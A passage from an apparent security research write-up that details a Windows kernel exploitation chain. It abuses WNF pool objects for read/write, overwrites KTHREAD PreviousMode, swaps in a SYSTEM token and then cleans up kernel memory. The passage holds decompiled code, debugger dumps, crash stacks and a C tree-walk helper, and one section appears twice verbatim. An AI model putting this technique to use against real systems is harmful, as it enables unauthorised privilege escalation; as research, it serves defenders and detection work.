   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

As we don’t know if we are going to overflow a _WNF_NAME_INSTANCE or a _WNF_STATE_DATA first, then we can trigger the overflow and check for corruption by loop through querying each _WNF_STATE_DATA using NtQueryWnfStateData.

If we detect corruption, then we know we have identified our _WNF_STATE_DATA object. If not, then we can repeatedly trigger the spray and overflow until we have obtained a _WNF_STATE_DATA object which allows a read/write across the pool subsegment.

There are a few problems with this approach, some which can be addressed and some which there is not a perfect solution for:

  1. We only want to corrupt _WNF_STATE_DATA objects but the pool segment also contains _WNF_NAME_INSTANCE objects due to needing to be the same size. Using only a 0x10 data size overflow and cleaning up afterwards (as described in the Kernel Memory Cleanup section) means that this issue does not cause a problem.

  2. Occasionally our unbounded _WNF_STATA_DATA containing chunk can be allocated within the final block within the pool segment. This means that when querying with NtQueryWnfStateData an unmapped memory read will occur off the end of the page. This rarely happens in practice and increasing the spray size reduces the likelihood of this occurring (see Exploit Testing and Statistics section).

  3. Other operating system functionality may make an allocation within the 0xC0 pool segment and lead to corruption and instability. By performing a large spray size before triggering the overflow, from practical testing, this seems to rarely happen within the test environment.

I think it’s useful to document these challenges with modern memory corruption exploitation techniques where it’s not always possible to gain 100% reliability.

Overall with 1) remediated and 2+3 only occurring very rarely, in lieu of a perfect solution we can move to the next stage.

Stage 2: Locating a _WNF_NAME_INSTANCE and overwriting the StateData pointer

Once we have unbounded our _WNF_STATE_DATA by overflowing the DataSize and AllocatedSize as described above, and within the first blog post, then we can then use the relative read to locate an adjacent _WNF_NAME_INSTANCE.

By scanning through the memory we can locate the pattern "\x03\x09\xa8" which denotes the start of a _WNF_NAME_INSTANCE and from this obtain the interesting member variables.

The CreatorProcess, StateName, StateData, ScopeInstance can be disclosed from the identified target object.

We can then use the relative write to replace the StateData pointer with an arbitrary location which is desired for our read and write primitive. For example, an offset within the _EPROCESS structure based on the address which has been obtained from CreatorProcess.

Care needs to be taken here to ensure that the new location StateData points at overlaps with sane values for the AllocatedSize, DataSize values preceding the data wishing to be read or written.

In this case the aim was to achieve a full arbitrary read and write but without having the constraints of needing to find sane and reliable AllocatedSize and DataSize values prior to the memory which it was desired to write too.

Our overall goal was to target the KTHREAD structure’s PreviousMode member and then make use of make use of the APIs NtReadVirtualMemory and NtWriteVirtualMemory to enable a more flexible arbitrary read and write.

It helps to have a good understanding of how these kernel memory structure are used to understand how this works. In a massively simplified overview, the kernel mode portion of Windows contains a number of subsystems. The hardware abstraction layer (HAL), the executive subsystems and the kernel. _EPROCESS is part of the executive layer which deals with general OS policy and operations. The kernel subsystem handles architecture specific details for low level operations and the HAL provides a abstraction layer to deal with differences between hardware.

Processes and threads are represeted at both the executive and kernel "layer" within kernel memory as _EPROCESS and _KPROCESS and _ETHREAD and _KTHREAD structures respectively.

The documentation on PreviousMode states "When a user-mode application calls the Nt or Zw version of a native system services routine, the system call mechanism traps the calling thread to kernel mode. To indicate that the parameter values originated in user mode, the trap handler for the system call sets the PreviousMode field in the thread object of the caller to UserMode. The native system services routine checks the PreviousMode field of the calling thread to determine whether the parameters are from a user-mode source."

Looking at MiReadWriteVirtualMemory which is called from NtWriteVirtualMemory we can see that if PreviousMode is not set when a user-mode thread executes, then the address validation is skipped and kernel memory space addresses can be written too:

__int64 __fastcall MiReadWriteVirtualMemory(
        HANDLE Handle,
        size_t BaseAddress,
        size_t Buffer,
        size_t NumberOfBytesToWrite,
        __int64 NumberOfBytesWritten,
        ACCESS_MASK DesiredAccess)
{
  int v7; // er13
  __int64 v9; // rsi
  struct _KTHREAD *CurrentThread; // r14
  KPROCESSOR_MODE PreviousMode; // al
  _QWORD *v12; // rbx
  __int64 v13; // rcx
  NTSTATUS v14; // edi
  _KPROCESS *Process; // r10
  PVOID v16; // r14
  int v17; // er9
  int v18; // er8
  int v19; // edx
  int v20; // ecx
  NTSTATUS v21; // eax
  int v22; // er10
  char v24; // [rsp+40h] [rbp-48h]
  __int64 v25; // [rsp+48h] [rbp-40h] BYREF
  PVOID Object[2]; // [rsp+50h] [rbp-38h] BYREF
  int v27; // [rsp+A0h] [rbp+18h]

  v27 = Buffer;
  v7 = BaseAddress;
  v9 = 0i64;
  Object[0] = 0i64;
  CurrentThread = KeGetCurrentThread();
  PreviousMode = CurrentThread->PreviousMode;
  v24 = PreviousMode;
  if ( PreviousMode )
  {
    if ( NumberOfBytesToWrite + BaseAddress < BaseAddress
      || NumberOfBytesToWrite + BaseAddress > 0x7FFFFFFF0000i64
      || Buffer + NumberOfBytesToWrite < Buffer
      || Buffer + NumberOfBytesToWrite > 0x7FFFFFFF0000i64 )
    {
      return 3221225477i64;
    }
    v12 = (_QWORD *)NumberOfBytesWritten;
    if ( NumberOfBytesWritten )
    {
      v13 = NumberOfBytesWritten;
      if ( (unsigned __int64)NumberOfBytesWritten >= 0x7FFFFFFF0000i64 )
        v13 = 0x7FFFFFFF0000i64;
      *(_QWORD *)v13 = *(_QWORD *)v13;
    }
  }

This technique was also covered previously within the NCC Group blog post on Exploiting Windows KTM too.

So how would we go about locating PreviousMode based on the address of _EPROCESS obtained from our relative read of CreatorProcess? At the start of the _EPROCESS structure, _KPROCESS is included as Pcb.

dt _EPROCESS
ntdll!_EPROCESS
   +0x000 Pcb              : _KPROCESS

Within _KPROCESS we have the following:

 dx -id 0,0,ffffd186087b1300 -r1 (*((ntdll!_KPROCESS *)0xffffd186087b1300))
(*((ntdll!_KPROCESS *)0xffffd186087b1300))                 [Type: _KPROCESS]
    [+0x000] Header           [Type: _DISPATCHER_HEADER]
    [+0x018] ProfileListHead  [Type: _LIST_ENTRY]
    [+0x028] DirectoryTableBase : 0xa3b11000 [Type: unsigned __int64]
    [+0x030] ThreadListHead   [Type: _LIST_ENTRY]
    [+0x040] ProcessLock      : 0x0 [Type: unsigned long]
    [+0x044] ProcessTimerDelay : 0x0 [Type: unsigned long]
    [+0x048] DeepFreezeStartTime : 0x0 [Type: unsigned __int64]
    [+0x050] Affinity         [Type: _KAFFINITY_EX]
    [+0x0f8] AffinityPadding  [Type: unsigned __int64 [12]]
    [+0x158] ReadyListHead    [Type: _LIST_ENTRY]
    [+0x168] SwapListEntry    [Type: _SINGLE_LIST_ENTRY]
    [+0x170] ActiveProcessors [Type: _KAFFINITY_EX]
    [+0x218] ActiveProcessorsPadding [Type: unsigned __int64 [12]]
    [+0x278 ( 0: 0)] AutoAlignment    : 0x0 [Type: unsigned long]
    [+0x278 ( 1: 1)] DisableBoost     : 0x0 [Type: unsigned long]
    [+0x278 ( 2: 2)] DisableQuantum   : 0x0 [Type: unsigned long]
    [+0x278 ( 3: 3)] DeepFreeze       : 0x0 [Type: unsigned long]
    [+0x278 ( 4: 4)] TimerVirtualization : 0x0 [Type: unsigned long]
    [+0x278 ( 5: 5)] CheckStackExtents : 0x0 [Type: unsigned long]
    [+0x278 ( 6: 6)] CacheIsolationEnabled : 0x0 [Type: unsigned long]
    [+0x278 ( 9: 7)] PpmPolicy        : 0x7 [Type: unsigned long]
    [+0x278 (10:10)] VaSpaceDeleted   : 0x0 [Type: unsigned long]
    [+0x278 (31:11)] ReservedFlags    : 0x0 [Type: unsigned long]
    [+0x278] ProcessFlags     : 896 [Type: long]
    [+0x27c] ActiveGroupsMask : 0x1 [Type: unsigned long]
    [+0x280] BasePriority     : 8 [Type: char]
    [+0x281] QuantumReset     : 6 [Type: char]
    [+0x282] Visited          : 0 [Type: char]
    [+0x283] Flags            [Type: _KEXECUTE_OPTIONS]
    [+0x284] ThreadSeed       [Type: unsigned short [20]]
    [+0x2ac] ThreadSeedPadding [Type: unsigned short [12]]
    [+0x2c4] IdealProcessor   [Type: unsigned short [20]]
    [+0x2ec] IdealProcessorPadding [Type: unsigned short [12]]
    [+0x304] IdealNode        [Type: unsigned short [20]]
    [+0x32c] IdealNodePadding [Type: unsigned short [12]]
    [+0x344] IdealGlobalNode  : 0x0 [Type: unsigned short]
    [+0x346] Spare1           : 0x0 [Type: unsigned short]
    [+0x348] StackCount       [Type: _KSTACK_COUNT]
    [+0x350] ProcessListEntry [Type: _LIST_ENTRY]
    [+0x360] CycleTime        : 0x0 [Type: unsigned __int64]
    [+0x368] ContextSwitches  : 0x0 [Type: unsigned __int64]
    [+0x370] SchedulingGroup  : 0x0 [Type: _KSCHEDULING_GROUP *]
    [+0x378] FreezeCount      : 0x0 [Type: unsigned long]
    [+0x37c] KernelTime       : 0x0 [Type: unsigned long]
    [+0x380] UserTime         : 0x0 [Type: unsigned long]
    [+0x384] ReadyTime        : 0x0 [Type: unsigned long]
    [+0x388] UserDirectoryTableBase : 0x0 [Type: unsigned __int64]
    [+0x390] AddressPolicy    : 0x0 [Type: unsigned char]
    [+0x391] Spare2           [Type: unsigned char [71]]
    [+0x3d8] InstrumentationCallback : 0x0 [Type: void *]
    [+0x3e0] SecureState      [Type: ]
    [+0x3e8] KernelWaitTime   : 0x0 [Type: unsigned __int64]
    [+0x3f0] UserWaitTime     : 0x0 [Type: unsigned __int64]
    [+0x3f8] EndPadding       [Type: unsigned __int64 [8]]

There is a member ThreadListHead which is a doubly linked list of _KTHREAD.

If the exploit only has one thread, then the Flink will be a pointer to an offset from the start of the _KTHREAD:

dx -id 0,0,ffffd186087b1300 -r1 (*((ntdll!_LIST_ENTRY *)0xffffd186087b1330))
(*((ntdll!_LIST_ENTRY *)0xffffd186087b1330))                 [Type: _LIST_ENTRY]
    [+0x000] Flink            : 0xffffd18606a54378 [Type: _LIST_ENTRY *]
    [+0x008] Blink            : 0xffffd18608840378 [Type: _LIST_ENTRY *]

From this we can calculate the base address of the _KTHREAD using the offset of 0x2F8 i.e. the ThreadListEntry offset.

0xffffd18606a54378 - 0x2F8 = 0xffffd18606a54080

We can check this correct (and see we hit our breakpoint in the previous article):

This technique was also covered previously within the NCC Group blog post on Exploiting Windows KTM too.

So how would we go about locating PreviousMode based on the address of _EPROCESS obtained from our relative read of CreatorProcess? At the start of the _EPROCESS structure, _KPROCESS is included as Pcb.

dt _EPROCESS
ntdll!_EPROCESS
   +0x000 Pcb              : _KPROCESS

Within _KPROCESS we have the following:

dx -id 0,0,ffffd186087b1300 -r1 (*((ntdll!_KPROCESS *)0xffffd186087b1300))
(*((ntdll!_KPROCESS *)0xffffd186087b1300))                 [Type: _KPROCESS]
    [+0x000] Header           [Type: _DISPATCHER_HEADER]
    [+0x018] ProfileListHead  [Type: _LIST_ENTRY]
    [+0x028] DirectoryTableBase : 0xa3b11000 [Type: unsigned __int64]
    [+0x030] ThreadListHead   [Type: _LIST_ENTRY]
    [+0x040] ProcessLock      : 0x0 [Type: unsigned long]
    [+0x044] ProcessTimerDelay : 0x0 [Type: unsigned long]
    [+0x048] DeepFreezeStartTime : 0x0 [Type: unsigned __int64]
    [+0x050] Affinity         [Type: _KAFFINITY_EX]
    [+0x0f8] AffinityPadding  [Type: unsigned __int64 [12]]
    [+0x158] ReadyListHead    [Type: _LIST_ENTRY]
    [+0x168] SwapListEntry    [Type: _SINGLE_LIST_ENTRY]
    [+0x170] ActiveProcessors [Type: _KAFFINITY_EX]
    [+0x218] ActiveProcessorsPadding [Type: unsigned __int64 [12]]
    [+0x278 ( 0: 0)] AutoAlignment    : 0x0 [Type: unsigned long]
    [+0x278 ( 1: 1)] DisableBoost     : 0x0 [Type: unsigned long]
    [+0x278 ( 2: 2)] DisableQuantum   : 0x0 [Type: unsigned long]
    [+0x278 ( 3: 3)] DeepFreeze       : 0x0 [Type: unsigned long]
    [+0x278 ( 4: 4)] TimerVirtualization : 0x0 [Type: unsigned long]
    [+0x278 ( 5: 5)] CheckStackExtents : 0x0 [Type: unsigned long]
    [+0x278 ( 6: 6)] CacheIsolationEnabled : 0x0 [Type: unsigned long]
    [+0x278 ( 9: 7)] PpmPolicy        : 0x7 [Type: unsigned long]
    [+0x278 (10:10)] VaSpaceDeleted   : 0x0 [Type: unsigned long]
    [+0x278 (31:11)] ReservedFlags    : 0x0 [Type: unsigned long]
    [+0x278] ProcessFlags     : 896 [Type: long]
    [+0x27c] ActiveGroupsMask : 0x1 [Type: unsigned long]
    [+0x280] BasePriority     : 8 [Type: char]
    [+0x281] QuantumReset     : 6 [Type: char]
    [+0x282] Visited          : 0 [Type: char]
    [+0x283] Flags            [Type: _KEXECUTE_OPTIONS]
    [+0x284] ThreadSeed       [Type: unsigned short [20]]
    [+0x2ac] ThreadSeedPadding [Type: unsigned short [12]]
    [+0x2c4] IdealProcessor   [Type: unsigned short [20]]
    [+0x2ec] IdealProcessorPadding [Type: unsigned short [12]]
    [+0x304] IdealNode        [Type: unsigned short [20]]
    [+0x32c] IdealNodePadding [Type: unsigned short [12]]
    [+0x344] IdealGlobalNode  : 0x0 [Type: unsigned short]
    [+0x346] Spare1           : 0x0 [Type: unsigned short]
    [+0x348] StackCount       [Type: _KSTACK_COUNT]
    [+0x350] ProcessListEntry [Type: _LIST_ENTRY]
    [+0x360] CycleTime        : 0x0 [Type: unsigned __int64]
    [+0x368] ContextSwitches  : 0x0 [Type: unsigned __int64]
    [+0x370] SchedulingGroup  : 0x0 [Type: _KSCHEDULING_GROUP *]
    [+0x378] FreezeCount      : 0x0 [Type: unsigned long]
    [+0x37c] KernelTime       : 0x0 [Type: unsigned long]
    [+0x380] UserTime         : 0x0 [Type: unsigned long]
    [+0x384] ReadyTime        : 0x0 [Type: unsigned long]
    [+0x388] UserDirectoryTableBase : 0x0 [Type: unsigned __int64]
    [+0x390] AddressPolicy    : 0x0 [Type: unsigned char]
    [+0x391] Spare2           [Type: unsigned char [71]]
    [+0x3d8] InstrumentationCallback : 0x0 [Type: void *]
    [+0x3e0] SecureState      [Type: ]
    [+0x3e8] KernelWaitTime   : 0x0 [Type: unsigned __int64]
    [+0x3f0] UserWaitTime     : 0x0 [Type: unsigned __int64]
    [+0x3f8] EndPadding       [Type: unsigned __int64 [8]]

There is a member ThreadListHead which is a doubly linked list of _KTHREAD.

If the exploit only has one thread, then the Flink will be a pointer to an offset from the start of the _KTHREAD:

dx -id 0,0,ffffd186087b1300 -r1 (*((ntdll!_LIST_ENTRY *)0xffffd186087b1330))
(*((ntdll!_LIST_ENTRY *)0xffffd186087b1330))                 [Type: _LIST_ENTRY]
    [+0x000] Flink            : 0xffffd18606a54378 [Type: _LIST_ENTRY *]
    [+0x008] Blink            : 0xffffd18608840378 [Type: _LIST_ENTRY *]

From this we can calculate the base address of the _KTHREAD using the offset of 0x2F8 i.e. the ThreadListEntry offset.

0xffffd18606a54378 - 0x2F8 = 0xffffd18606a54080

We can check this correct (and see we hit our breakpoint in the previous article):

0: kd> !thread 0xffffd18606a54080
THREAD ffffd18606a54080  Cid 1da0.1da4  Teb: 000000ce177e0000 Win32Thread: 0000000000000000 RUNNING on processor 0
IRP List:
    ffffd18608002050: (0006,0430) Flags: 00060004  Mdl: 00000000
Not impersonating
DeviceMap                 ffffba0cc30c6630
Owning Process            ffffd186087b1300       Image:         amberzebra.exe
Attached Process          N/A            Image:         N/A
Wait Start TickCount      2344           Ticks: 1 (0:00:00:00.015)
Context Switch Count      149            IdealProcessor: 1             
UserTime                  00:00:00.000
KernelTime                00:00:00.015
Win32 Start Address 0x00007ff6da2c305c
Stack Init ffffd0096cdc6c90 Current ffffd0096cdc6530
Base ffffd0096cdc7000 Limit ffffd0096cdc1000 Call 0000000000000000
Priority 8 BasePriority 8 PriorityDecrement 0 IoPriority 2 PagePriority 5
Child-SP          RetAddr           : Args to Child                                                           : Call Site
ffffd009`6cdc62a8 fffff805`5a99bc7a : 00000000`00000000 00000000`000000d0 00000000`00000000 ffffba0c`00000000 : Ntfs!NtfsQueryEaUserEaList
ffffd009`6cdc62b0 fffff805`5a9fc8a6 : ffffd009`6cdc6560 ffffd186`08002050 ffffd186`08002300 ffffd186`06a54000 : Ntfs!NtfsCommonQueryEa+0x22a
ffffd009`6cdc6410 fffff805`5a9fc600 : ffffd009`6cdc6560 ffffd186`08002050 ffffd186`08002050 ffffd009`6cdc7000 : Ntfs!NtfsFsdDispatchSwitch+0x286
ffffd009`6cdc6540 fffff805`570d1f35 : ffffd009`6cdc68b0 fffff805`54704b46 ffffd009`6cdc7000 ffffd009`6cdc1000 : Ntfs!NtfsFsdDispatchWait+0x40
ffffd009`6cdc67e0 fffff805`54706ccf : ffffd186`02802940 ffffd186`00000030 00000000`00000000 00000000`00000000 : nt!IofCallDriver+0x55
ffffd009`6cdc6820 fffff805`547048d3 : ffffd009`6cdc68b0 00000000`00000000 00000000`00000001 ffffd186`03074bc0 : FLTMGR!FltpLegacyProcessingAfterPreCallbacksCompleted+0x28f
ffffd009`6cdc6890 fffff805`570d1f35 : ffffd186`08002050 00000000`000000c0 00000000`000000c8 00000000`000000a4 : FLTMGR!FltpDispatch+0xa3
ffffd009`6cdc68f0 fffff805`574a6fb8 : ffffd186`08002050 00000000`00000000 00000000`00000000 fffff805`577b2094 : nt!IofCallDriver+0x55
ffffd009`6cdc6930 fffff805`57455834 : 000000ce`00000000 ffffd009`6cdc6b80 ffffd186`084eb7b0 ffffd009`6cdc6b80 : nt!IopSynchronousServiceTail+0x1a8
ffffd009`6cdc69d0 fffff805`572058b5 : ffffd186`06a54080 000000ce`178fdae8 000000ce`178feba0 00000000`000000a3 : nt!NtQueryEaFile+0x484
ffffd009`6cdc6a90 00007fff`0bfae654 : 00007ff6`da2c14dd 00007ff6`da2c4490 00000000`000000a3 000000ce`178fbee8 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffffd009`6cdc6b00)
000000ce`178fdac8 00007ff6`da2c14dd : 00007ff6`da2c4490 00000000`000000a3 000000ce`178fbee8 0000026e`edf509ba : ntdll!NtQueryEaFile+0x14
000000ce`178fdad0 00007ff6`da2c4490 : 00000000`000000a3 000000ce`178fbee8 0000026e`edf509ba 00000000`00000000 : 0x00007ff6`da2c14dd
000000ce`178fdad8 00000000`000000a3 : 000000ce`178fbee8 0000026e`edf509ba 00000000`00000000 000000ce`178fdba0 : 0x00007ff6`da2c4490
000000ce`178fdae0 000000ce`178fbee8 : 0000026e`edf509ba 00000000`00000000 000000ce`178fdba0 000000ce`00000017 : 0xa3
000000ce`178fdae8 0000026e`edf509ba : 00000000`00000000 000000ce`178fdba0 000000ce`00000017 00000000`00000000 : 0x000000ce`178fbee8
000000ce`178fdaf0 00000000`00000000 : 000000ce`178fdba0 000000ce`00000017 00000000`00000000 0000026e`00000001 : 0x0000026e`edf509ba

So we now know how to calculate the address of the `_KTHREAD` kernel data structure which is associated with our running exploit thread. 


At the end of stage 2 we have the following memory layout:

Stage 3 – Abusing PreviousMode

Once we have set the StateData pointer of the _WNF_NAME_INSTANCE prior to the _KPROCESS ThreadListHead Flink we can leak out the value by confusing it with the DataSize and the ChangeTimestamp, we can then calculate the FLINK as “FLINK = (uintptr_t)ChangeTimestamp << 32 | DataSize` after querying the object.

This allows us to calculate the _KTHREAD address using FLINK - 0x2f8.

Once we have the address of the _KTHREAD we need to again find a sane value to confuse with the AllocatedSize and DataSize to allow reading and writing of PreviousMode value at offset 0x232.

In this case, pointing it into here:

   +0x220 Process          : 0xffff900f`56ef0340 _KPROCESS
   +0x228 UserAffinity     : _GROUP_AFFINITY
   +0x228 UserAffinityFill : [10]  &quot;???&quot;

Gives the following "sane" values:

dt _WNF_STATE_DATA FLINK-0x2f8+0x220

nt!_WNF_STATE_DATA
+ 0x000 Header           : _WNF_NODE_HEADER
+ 0x004 AllocatedSize : 0xffff900f
+ 0x008 DataSize : 3
+ 0x00c ChangeStamp : 0

Allowing the most significant word of the Process pointer shown above to be used as the AllocatedSize and the UserAffinity to act as the DataSize. Incidentally, we can actually influence this value used for DataSize using SetProcessAffinityMask or launching the process with start /affinity exploit.exe but for our purposes of being able to read and write PreviousMode this is fine.

Visually this looks as follows after the StateData has been modified:

This gives a 3 byte read (and up to 0xffff900f bytes write if needed – but we only need 3 bytes), of which the PreviousMode is included (i.e set to 1 before modification):

00 00 01 00 00 00 00 00  00 00 | ..........

Using the most significant word of the pointer with it always being a kernel mode address, should ensure that this is a sufficient AllocatedSize to enable overwriting PreviousMode.

Post Exploitation

Once we have set PreviousMode to 0, as mentioned above, this now gives an unconstrained read/write across the whole kernel memory space using NtWriteVirtualMemory and NtReadVirtualMemory. This is a very powerful method and demonstrates how moving from an awkward to use arbitrary read/write to a better method which enables easier post exploitation and enhanced clean up options.

It is then trivial to walk the ActiveProcessLinks within the EPROCESS, obtain a pointer to a SYSTEM token and replace the existing token with this or to perform escalation by overwriting the _SEP_TOKEN_PRIVILEGES for the existing token using techniques which have been long used by Windows exploits.

Kernel Memory Cleanup

OK, so the above is good enough for a proof of concept exploit but due to the potentially large amount of memory writes needing to occur for exploit success, then it could leave the kernel in a bad state. Also, when the process terminates then certain memory locations which have been overwritten could trigger a BSOD when that corrupted memory is used.

This part of the exploitation process is often overlooked by proof of concept exploit writers but is often the most challenging for use in real world scenario’s (red teams / simulated attacks etc) where stability and reliability are important. Going through this process also helps understand how these types of attacks can also be detected.

This section of the blog describes some improvements which can be made in this area.

PreviousMode Restoration

On the version of Windows tested, if we try to launch a new process as SYSTEM but PreviousMode is still set to 0. Then we end up with the following crash:

```
Access violation - code c0000005 (!!! second chance !!!)
nt!PspLocateInPEManifest+0xa9:
fffff804`502f1bb5 0fba68080d      bts     dword ptr [rax+8],0Dh
0: kd> kv
 # Child-SP          RetAddr           : Args to Child                                                           : Call Site
00 ffff8583`c6259c90 fffff804`502f0689 : 00000195`b24ec500 00000000`00000000 00000000`00000428 00007ff6`00000000 : nt!PspLocateInPEManifest+0xa9
01 ffff8583`c6259d00 fffff804`501f19d0 : 00000000`000022aa ffff8583`c625a350 00000000`00000000 00000000`00000000 : nt!PspSetupUserProcessAddressSpace+0xdd
02 ffff8583`c6259db0 fffff804`5021ca6d : 00000000`00000000 ffff8583`c625a350 00000000`00000000 00000000`00000000 : nt!PspAllocateProcess+0x11a4
03 ffff8583`c625a2d0 fffff804`500058b5 : 00000000`00000002 00000000`00000001 00000000`00000000 00000195`b24ec560 : nt!NtCreateUserProcess+0x6ed
04 ffff8583`c625aa90 00007ffd`b35cd6b4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffff8583`c625ab00)
05 0000008c`c853e418 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!NtCreateUserProcess+0x14
```

More research needs to be performed to determine if this is necessary on prior versions or if this was a recently introduced change.

This can be fixed simply by using our NtWriteVirtualMemory APIs to restore the PreviousMode value to 1 before launching the cmd.exe shell.

StateData Pointer Restoration

The _WNF_STATE_DATA StateData pointer is free’d when the _WNF_NAME_INSTANCE is freed on process termination (incidentially also an arbitrary free). If this is not restored to the original value, we will end up with a crash as follows:

00 ffffdc87`2a708cd8 fffff807`27912082 : ffffdc87`2a708e40 fffff807`2777b1d0 00000000`00000100 00000000`00000000 : nt!DbgBreakPointWithStatus
01 ffffdc87`2a708ce0 fffff807`27911666 : 00000000`00000003 ffffdc87`2a708e40 fffff807`27808e90 00000000`0000013a : nt!KiBugCheckDebugBreak+0x12
02 ffffdc87`2a708d40 fffff807`277f3fa7 : 00000000`00000003 00000000`00000023 00000000`00000012 00000000`00000000 : nt!KeBugCheck2+0x946
03 ffffdc87`2a709450 fffff807`2798d938 : 00000000`0000013a 00000000`00000012 ffffa409`6ba02100 ffffa409`7120a000 : nt!KeBugCheckEx+0x107
04 ffffdc87`2a709490 fffff807`2798d998 : 00000000`00000012 ffffdc87`2a7095a0 ffffa409`6ba02100 fffff807`276df83e : nt!RtlpHeapHandleError+0x40
05 ffffdc87`2a7094d0 fffff807`2798d5c5 : ffffa409`7120a000 ffffa409`6ba02280 ffffa409`6ba02280 00000000`00000001 : nt!RtlpHpHeapHandleError+0x58
06 ffffdc87`2a709500 fffff807`2786667e : ffffa409`71293280 00000000`00000001 00000000`00000000 ffffa409`6f6de600 : nt!RtlpLogHeapFailure+0x45
07 ffffdc87`2a709530 fffff807`276cbc44 : 00000000`00000000 ffffb504`3b1aa7d0 00000000`00000000 ffffb504`00000000 : nt!RtlpHpVsContextFree+0x19954e
08 ffffdc87`2a7095d0 fffff807`27db2019 : 00000000`00052d20 ffffb504`33ea4600 ffffa409`712932a0 01000000`00100000 : nt!ExFreeHeapPool+0x4d4        
09 ffffdc87`2a7096b0 fffff807`27a5856b : ffffb504`00000000 ffffb504`00000000 ffffb504`3b1ab020 ffffb504`00000000 : nt!ExFreePool+0x9
0a ffffdc87`2a7096e0 fffff807`27a58329 : 00000000`00000000 ffffa409`712936d0 ffffa409`712936d0 ffffb504`00000000 : nt!ExpWnfDeleteStateData+0x8b
0b ffffdc87`2a709710 fffff807`27c46003 : ffffffff`ffffffff ffffb504`3b1ab020 ffffb504`3ab0f780 00000000`00000000 : nt!ExpWnfDeleteNameInstance+0x1ed
0c ffffdc87`2a709760 fffff807`27b0553e : 00000000`00000000 ffffdc87`2a709990 00000000`00000000 00000000`00000000 : nt!ExpWnfDeleteProcessContext+0x140a9b
0d ffffdc87`2a7097a0 fffff807`27a9ea7f : ffffa409`7129d080 ffffb504`336506a0 ffffdc87`2a709990 00000000`00000000 : nt!ExWnfExitProcess+0x32
0e ffffdc87`2a7097d0 fffff807`279f4558 : 00000000`c000013a 00000000`00000001 ffffdc87`2a7099e0 00000055`8b6d6000 : nt!PspExitThread+0x5eb
0f ffffdc87`2a7098d0 fffff807`276e6ca7 : 00000000`00000000 00000000`00000000 00000000`00000000 fffff807`276f0ee6 : nt!KiSchedulerApcTerminate+0x38
10 ffffdc87`2a709910 fffff807`277f8440 : 00000000`00000000 ffffdc87`2a7099c0 ffffdc87`2a709b80 ffffffff`00000000 : nt!KiDeliverApc+0x487
11 ffffdc87`2a7099c0 fffff807`2780595f : ffffa409`71293000 00000251`173f2b90 00000000`00000000 00000000`00000000 : nt!KiInitiateUserApc+0x70
12 ffffdc87`2a709b00 00007ff9`18cabe44 : 00007ff9`165d26ee 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceExit+0x9f (TrapFrame @ ffffdc87`2a709b00)
13 00000055`8b8ffb28 00007ff9`165d26ee : 00000000`00000000 00000000`00000000 00000000`00000000 00007ff9`18c5a800 : ntdll!NtWaitForSingleObject+0x14
14 00000055`8b8ffb30 00000000`00000000 : 00000000`00000000 00000000`00000000 00007ff9`18c5a800 00000000`00000000 : 0x00007ff9`165d26ee

Although we could restore this using the WNF relative read/write, as we have arbitrary read and write using the APIs, we can implement a function which uses a previously saved ScopeInstance pointer to search for the StateName of our targeted _WNF_NAME_INSTANCE object address.

Visually this looks as follows:

Some example code for this is:

/**
* This function returns back the address of a _WNF_NAME_INSTANCE looked up by its internal StateName
* It performs an _RTL_AVL_TREE tree walk against the sorted tree of _WNF_NAME_INSTANCES. 
* The tree root is at _WNF_SCOPE_INSTANCE+0x38 (NameSet)
**/
QWORD* FindStateName(unsigned __int64 StateName)
{
    QWORD* i;
    
    // _WNF_SCOPE_INSTANCE+0x38 (NameSet)
    for (i = (QWORD*)read64((char*)BackupScopeInstance+0x38); ; i = (QWORD*)read64((char*)i + 0x8))
    {

        while (1)
        {
            if (!i)
                return 0;

            // StateName is 0x18 after the TreeLinks FLINK
            QWORD CurrStateName = (QWORD)read64((char*)i + 0x18);

            if (StateName >= CurrStateName)
                break;

            i = (QWORD*)read64(i);
        }
        QWORD CurrStateName = (QWORD)read64((char*)i + 0x18);

        if (StateName <= CurrStateName)
            break; 
    }
    return (QWORD*)((QWORD*)i - 2);
}

Then once we have obtained our _WNF_NAME_INSTANCE we can then restore the original StateData pointer.

RunRef Restoration

The next crash encountered was related to the fact that we may have corrupted many RunRef from _WNF_NAME_INSTANCE‘s in the process of obtaining our unbounded _WNF_STATE_DATA. When ExReleaseRundownProtection is called and an invalid value is present, we will crash as follows:

1: kd> kv
 # Child-SP          RetAddr           : Args to Child                                                           : Call Site
00 ffffeb0f`0e9e5bf8 fffff805`2f512082 : ffffeb0f`0e9e5d60 fffff805`2f37b1d0 00000000`00000000 00000000`00000000 : nt!DbgBreakPointWithStatus
01 ffffeb0f`0e9e5c00 fffff805`2f511666 : 00000000`00000003 ffffeb0f`0e9e5d60 fffff805`2f408e90 00000000`0000003b : nt!KiBugCheckDebugBreak+0x12
02 ffffeb0f`0e9e5c60 fffff805`2f3f3fa7 : 00000000`00000103 00000000`00000000 fffff805`2f0e3838 ffffc807`cdb5e5e8 : nt!KeBugCheck2+0x946
03 ffffeb0f`0e9e6370 fffff805`2f405e69 : 00000000`0000003b 00000000`c0000005 fffff805`2f242c32 ffffeb0f`0e9e6cb0 : nt!KeBugCheckEx+0x107
04 ffffeb0f`0e9e63b0 fffff805`2f4052bc : ffffeb0f`0e9e7478 fffff805`2f0e3838 ffffeb0f`0e9e65a0 00000000`00000000 : nt!KiBugCheckDispatch+0x69
05 ffffeb0f`0e9e64f0 fffff805`2f3fcd5f : fffff805`2f405240 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceHandler+0x7c
06 ffffeb0f`0e9e6530 fffff805`2f285027 : ffffeb0f`0e9e6aa0 00000000`00000000 ffffeb0f`0e9e7b00 fffff805`2f40595f : nt!RtlpExecuteHandlerForException+0xf
07 ffffeb0f`0e9e6560 fffff805`2f283ce6 : ffffeb0f`0e9e7478 ffffeb0f`0e9e71b0 ffffeb0f`0e9e7478 ffffa300`da5eb5d8 : nt!RtlDispatchException+0x297
08 ffffeb0f`0e9e6c80 fffff805`2f405fac : ffff521f`0e9e8ad8 ffffeb0f`0e9e7560 00000000`00000000 00000000`00000000 : nt!KiDispatchException+0x186
